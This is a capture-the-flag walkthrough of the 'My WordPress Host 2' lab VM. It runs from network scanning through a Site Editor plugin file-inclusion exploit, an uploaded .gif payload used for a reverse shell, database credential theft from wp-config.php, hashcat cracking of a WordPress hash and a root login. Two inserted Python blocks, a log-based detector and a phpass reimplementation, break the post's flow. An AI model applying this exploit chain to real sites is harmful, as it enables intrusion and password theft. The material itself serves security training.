My WordPress Host 2: Walkthrough (Infosec Warrior)

Pulkit Marele
5 min read · Jan 5, 2021

Today we continue with another machine from Infosec Warrior. In this article we walk through an interesting Infosec Warrior machine called My WordPress Host 2.

Here is the link to download this VM:

https://www.infosecwarrior.com/my-wordpress-host-2/

Network Scanning

We always start with network scanning. Let's find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As the netdiscover result shows, our target IP address is 192.168.43.94.

Enumeration/Reconnaissance

Our next step is scanning the target machine. Let's start with nmap.

┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.94

With nmap we can see all the open TCP ports. Let's start with port 80, which is HTTP.

┌─[root@RDX]─[~]
└──╼ #vim /etc/hosts

Add an entry for the target in /etc/hosts so the site renders properly.

Open http://192.168.43.94/ in the browser.

┌─[✗]─[root@RDX]─[~]
└──╼ #wpscan --url http://192.168.43.94/ --enumerate ap --plugins-detection aggressive

wpscan finds the Site Editor plugin, so let's go with that.

Search the web for an exploit for this plugin.

Exploit-DB has one.

EXPLOIT:

http://www.infosec.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Give the payload file a .gif or .jpg name.

Upload the abc.gif payload through the Contact Us form.

Then open the uploaded file in the browser:

http://www.infosec.local/wp-content/uploads/2020/12/abc.gif

┌─[✗]─[root@RDX]─[~]
└──╼ #nc -nlvp 443

Then request this URL in the browser so the vulnerable parameter includes the uploaded file and triggers the reverse shell:

http://www.infosec.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/www/html/wordpress/wp-content/uploads/2020/12/abc.gif

Now I have a shell.
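From a defender's view, both stages of this chain leave a distinctive trail in the web server's access log: a request to ajax_shortcode_pattern.php whose ajax_path is an absolute path or a traversal (the /etc/passwd read), followed by one whose ajax_path points into wp-content/uploads (the included "image"). As an added example that is not part of the original post, this Python script classifies such entries; the log lines are constructed to mirror the requests above, and example_pattern.php is a made-up benign value.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Added example, not part of the original post: flag web-server log entries that
# abuse the Site Editor plugin's ajax_path parameter, which the walkthrough uses
# first to read /etc/passwd and then to include an uploaded .gif for a shell.
VULN_SCRIPT = "ajax_shortcode_pattern.php"
IMAGE_EXTS = (".gif", ".jpg", ".jpeg", ".png")
# Apache combined log format; only the client IP and request URL are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<url>\S+) HTTP/[\d.]+"')


def classify_request(url):
    """Return a finding label for one request URL, or None if it looks benign."""
    parsed = urlparse(url)
    if not parsed.path.endswith(VULN_SCRIPT):
        return None
    values = parse_qs(parsed.query).get("ajax_path")
    if not values:
        return None
    path = unquote(values[0])  # parse_qs decoded once; undo double encoding too
    if path.startswith("/") or ".." in path or "://" in path:
        if "/uploads/" in path or path.lower().endswith(IMAGE_EXTS):
            return "lfi-to-rce"  # including a user-uploaded "image" runs its PHP
        return "lfi"  # arbitrary file read, e.g. /etc/passwd
    return None


def scan_log(lines):
    """Return (client ip, label, requested url) for every suspicious entry."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        label = classify_request(m["url"])
        if label is not None:
            findings.append((m["ip"], label, m["url"]))
    return findings


# Constructed sample entries mirroring the walkthrough's requests; the last one
# is a made-up benign relative path, the kind of value the parameter expects.
SAMPLE_LOG = [
    '192.168.43.10 - - [30/Dec/2020:20:10:01 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 200 2731',
    '192.168.43.10 - - [30/Dec/2020:20:13:02 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/www/html/wordpress/wp-content/uploads/2020/12/abc.gif HTTP/1.1" 200 0',
    '192.168.43.20 - - [30/Dec/2020:20:14:00 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=example_pattern.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```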

$ id

$ python3.7 -c 'import pty;pty.spawn("/bin/bash")'

www-data@wordpress:/$

www-data@wordpress:/$ cd /var/www/html/wordpress

www-data@wordpress:/var/www/html/wordpress$ cat wp-config.php

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'root' );

Privilege Escalation

www-data@wordpress:/$ mysql -u root -p
mysql -u root -p
Enter password: root

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 19
Server version: 5.7.29 MySQL Community Server (GPL)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases ;

mysql> use wordpress_db ;

mysql> show tables;

mysql> select * from wp_users ;

mysql> exit ;

┌─[root@RDX]─[~]
└──╼ #vim password.txt

$P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.

┌─[root@RDX]─[~]
└──╼ #hashcat -m 400 -a 0 -o pass.txt password.txt /root/rockyou.txt

hashcat (v6.1.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.0)
====================
* Device #1: GeForce GTX 1650, 3844/3911 MB, 16MCU

OpenCL API (OpenCL 1.2 CUDA 11.0.228) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1650, skipped

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
=============================================================================================================================
* Device #3: pthread-AMD Ryzen 7 3750H with Radeon Vega Mobile Gfx, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 345 MB

Dictionary cache built:
* Filename..: /root/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password- and salt-length (typically down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

Session..........: hashcat
Status...........: Cracked
Hash.Name........: phpass
Hash.Target......: $P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.
Time.Started.....: Wed Dec 30 20:32:08 2020 (25 secs)
Time.Estimated...: Wed Dec 30 20:32:33 2020 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 442.6 kH/s (6.68ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8128-8192
Candidates.#1....: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 49c Util: 65% Core:1620MHz Mem:3500MHz Bus:8

Started: Wed Dec 30 20:32:00 2020
Stopped: Wed Dec 30 20:32:34 2020

┌─[root@RDX]─[~]
└──╼ #cat pass.txt

Now I have the password.
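The value pulled from wp_users is a phpass portable hash (hashcat mode 400, shown as "Hash.Name: phpass" above). As an added example that is not part of the original post, here is a minimal Python reimplementation that decodes the setting prefix and verifies candidates: the 'B' after $P$ means only 2^13 = 8192 unkeyed MD5 rounds per guess, which is why one GTX 1650 reaches 442.6 kH/s and would exhaust the 14,344,385-word rockyou keyspace in roughly 32 seconds (consistent with the crack at 76% after 25 seconds). PAGE_HASH is the page's own value; the round-trip password used to exercise the code is constructed.

```python
import hashlib
import hmac

# Added example, not part of the original post: a minimal reimplementation of the
# phpass "portable" hash (hashcat mode 400) that WordPress stored in wp_users,
# to show what the $P$B... value dumped above actually encodes.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PAGE_HASH = "$P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW."  # the hash taken from the page

def encode64(data, count):
    """phpass' own base64 variant: 16 digest bytes become 22 output chars."""
    out, i = "", 0
    while i < count:
        value = data[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count: value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count: break
        i += 1
        if i < count: value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count: break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out

def parse_setting(stored):
    """Return (iterations, salt) from the 12-char setting prefix of a hash."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(stored[3])  # 'B' -> 13 -> 2**13 MD5 rounds
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, stored[4:12]

def phpass_hash(password, setting):
    """Hash a password under a setting: '$P$' + count char + 8-char salt."""
    iterations, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(iterations):  # cheap unkeyed MD5 rounds, hence the kH/s above
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest, 16)

def verify(stored, password):
    """Constant-time check of a candidate password against a stored hash."""
    return hmac.compare_digest(phpass_hash(password, stored[:12]), stored)
```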

Now to root the machine.

www-data@wordpress:/var/www/html/wordpress$ su root
su root
Password: Linuxroot

root@wordpress:/var/www/html/wordpress# cd

root@wordpress:~# ls

root@wordpress:~# id

root@wordpress:~# cat proof.txt

Successfully got root privileges and the 'proof.txt' flag.
